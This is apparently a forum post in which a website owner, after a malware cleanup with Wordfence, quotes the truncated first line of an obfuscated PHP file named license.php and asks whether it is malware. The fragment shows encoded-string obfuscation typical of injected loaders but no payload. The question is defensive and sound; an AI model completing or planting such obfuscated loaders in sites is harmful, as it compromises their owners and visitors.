HI,
I recently discovered a malware infection on one of my sites. After cleaning it up, using Wordfence plugin to scan for changed files, I noticed a file in the root dir called license.php.
The beginning of the file looks like this:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x4
And so it continues.
Anyone knows if this is malware?